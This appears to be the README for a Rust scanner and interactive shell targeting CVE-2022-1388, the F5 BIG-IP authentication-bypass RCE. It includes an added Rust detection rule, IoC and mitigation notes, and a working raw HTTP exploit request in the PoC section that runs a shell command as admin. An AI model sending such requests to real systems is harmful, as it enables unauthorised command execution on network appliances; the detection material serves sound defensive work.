# CVE-2022-1388-rs
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust

## Summary
Here is an overview of the conditions a request must satisfy to exploit this vulnerability:

- The Connection header must include X-F5-Auth-Token
- The X-F5-Auth-Token header must be present
- The Host header must be localhost, or the Connection header must include X-Forwarded-Host
- The Authorization header must be set with the admin username and any password
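The same four conditions can be turned into a detection rule. The following is an added example, not part of CVE-2022-1388-rs: it parses a raw HTTP request (as captured by a reverse proxy or WAF in front of the management interface) and flags requests that carry every precondition listed above against an iControl REST path. Sample requests and the Basic credential are constructed placeholders.

```rust
use std::collections::HashMap;

/// Parse the request line and headers of a raw HTTP request.
/// Header names are lower-cased so later lookups are case-insensitive.
fn parse_request(raw: &str) -> (String, HashMap<String, String>) {
    let mut lines = raw.lines();
    let request_line = lines.next().unwrap_or("").to_string();
    let mut headers = HashMap::new();
    for line in lines {
        if line.trim().is_empty() {
            break; // blank line ends the headers; the body is not needed here
        }
        if let Some((name, value)) = line.split_once(':') {
            headers.insert(name.trim().to_ascii_lowercase(), value.trim().to_string());
        }
    }
    (request_line, headers)
}

/// Does the comma-separated Connection header list `token` (case-insensitive)?
fn connection_lists(headers: &HashMap<String, String>, token: &str) -> bool {
    headers
        .get("connection")
        .map_or(false, |v| v.split(',').any(|t| t.trim().eq_ignore_ascii_case(token)))
}

/// True when a request to an iControl REST path carries all bypass preconditions:
/// Connection advertising X-F5-Auth-Token, that header present, Basic auth present,
/// and Host set to localhost or Connection listing X-Forwarded-Host.
pub fn is_bypass_attempt(raw: &str) -> bool {
    let (request_line, headers) = parse_request(raw);
    let path = request_line.split_whitespace().nth(1).unwrap_or("");
    let targets_icontrol = path.starts_with("/mgmt/");
    let token_present = headers.contains_key("x-f5-auth-token");
    let basic_auth = headers
        .get("authorization")
        .map_or(false, |v| v.to_ascii_lowercase().starts_with("basic "));
    let host_localhost = headers.get("host").map_or(false, |h| {
        h.split(':').next().unwrap_or("").eq_ignore_ascii_case("localhost") // ignore port
    });
    let host_spoofable = host_localhost || connection_lists(&headers, "x-forwarded-host");
    targets_icontrol && connection_lists(&headers, "x-f5-auth-token") && token_present && basic_auth && host_spoofable
}

fn main() {
    // Constructed sample shaped like the PoC request (placeholder credential, no body).
    let hit = "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: localhost\r\nAuthorization: Basic QURNSU46cGxhY2Vob2xkZXI=\r\nX-F5-Auth-Token: anything\r\nConnection: X-F5-Auth-Token\r\n\r\n";
    // Constructed benign sample: ordinary token-authenticated iControl call.
    let benign = "GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: bigip.example\r\nX-F5-Auth-Token: abc\r\nConnection: keep-alive\r\n\r\n";
    println!("PoC-shaped request flagged: {}", is_bypass_attempt(hit));
    println!("benign request flagged: {}", is_bypass_attempt(benign));
}
```

The check deliberately requires all conditions at once to keep false positives low; a looser rule that alerts on any request whose Connection header names X-F5-Auth-Token is a reasonable hunting query since legitimate clients have no reason to send it.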

## PoC

```http
POST /mgmt/tm/util/bash HTTP/1.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39

"utilCmdArgs":"-c id"
```

## Lab setup

- You can find the lab <a href="">Here</a>

## Usage

## Requirements

- Rust
- Cargo

## IoCs

IoCs can be found in the `/var/log/audit` log file. Unrecognized commands executed through the `mgmt/tm/util/bash` endpoint should be cause for concern.

## Mitigation

Update to the latest version, or mitigate by following the instructions in the F5 Security Advisory.

## References